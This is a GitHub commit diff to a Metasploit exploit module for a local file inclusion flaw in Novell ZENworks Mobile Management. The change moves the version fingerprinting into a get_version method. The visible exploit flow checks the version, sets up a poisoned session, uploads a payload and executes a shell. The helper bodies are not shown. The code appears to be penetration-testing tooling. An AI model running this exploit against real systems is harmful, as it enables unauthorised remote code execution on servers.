Skip to content

Commit a270d37

Browse files
wchen-r7wchen-r7
committed
Take apart the version detection code
1 parent 25fe03b commit a270d37

File tree

1 file changed

+28
-19
lines changed

1 file changed

+28
-19
lines changed

modules/exploits/windows/http/novell_mdm_lfi.rb

Lines changed: 28 additions & 19 deletions
Original file line numberDiff line numberDiff line change
@@ -52,6 +52,21 @@ def peer
5252
"#{rhost}:#{rport}"
5353
end
5454

55+
def get_version
56+
version = nil
57+
58+
res = send_request_raw({
59+
'method' => 'GET',
60+
'uri' => target_uri.path
61+
})
62+
63+
if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
64+
version = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
65+
end
66+
67+
return version
68+
end
69+
5570
def setup_session()
5671
sess = Rex::Text.rand_text_alpha(8)
5772
cmd = Rex::Text.rand_text_alpha(8)
@@ -104,28 +119,22 @@ def exec_shell(session_id,cmd_var,fname)
104119

105120

106121
def exploit()
107-
uri = normalize_uri(target_uri.path)
108122
begin
109-
res = send_request_raw({
110-
'method' => 'GET',
111-
'uri' => uri
112-
})
113-
114-
if (res and res.code == 200 and res.body.to_s.match(/ZENworks Mobile Management User Self-Administration Portal/) != nil)
115-
print_status("#{peer} - Found Zenworks MDM, Checking application version")
116-
ver = res.body.to_s.match(/<p id="version">Version (.*)<\/p>/)[1]
117-
print_status("#{peer} - Found Version #{ver}")
118-
print_status("#{peer} - Setting up poisoned session")
119-
session_id,cmd = setup_session()
120-
print_status("#{peer} - Uploading payload")
121-
fname = upload_shell(session_id,cmd)
122-
print_status("#{peer} - Executing payload")
123-
exec_shell(session_id,cmd,fname)
124-
else
125-
print_error("#{peer} - Zenworks MDM does not appear to be running at #{rhost}")
126-
return :abort
123+
print_status("#{peer} - Checking application version...")
124+
v = get_version
125+
if v.nil?
126+
print_error("#{peer} - Unable to detect version, abort!")
127+
return
127128
end
128129

130+
print_good("#{peer} - Found Version #{v}")
131+
print_status("#{peer} - Setting up poisoned session")
132+
session_id,cmd = setup_session()
133+
print_status("#{peer} - Uploading payload")
134+
fname = upload_shell(session_id,cmd)
135+
print_status("#{peer} - Executing payload")
136+
exec_shell(session_id,cmd,fname)
137+
129138
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
130139
rescue ::Timeout::Error, ::Errno::EPIPE
131140
rescue ::OpenSSL::SSL::SSLError => e

0 commit comments

Comments
 (0)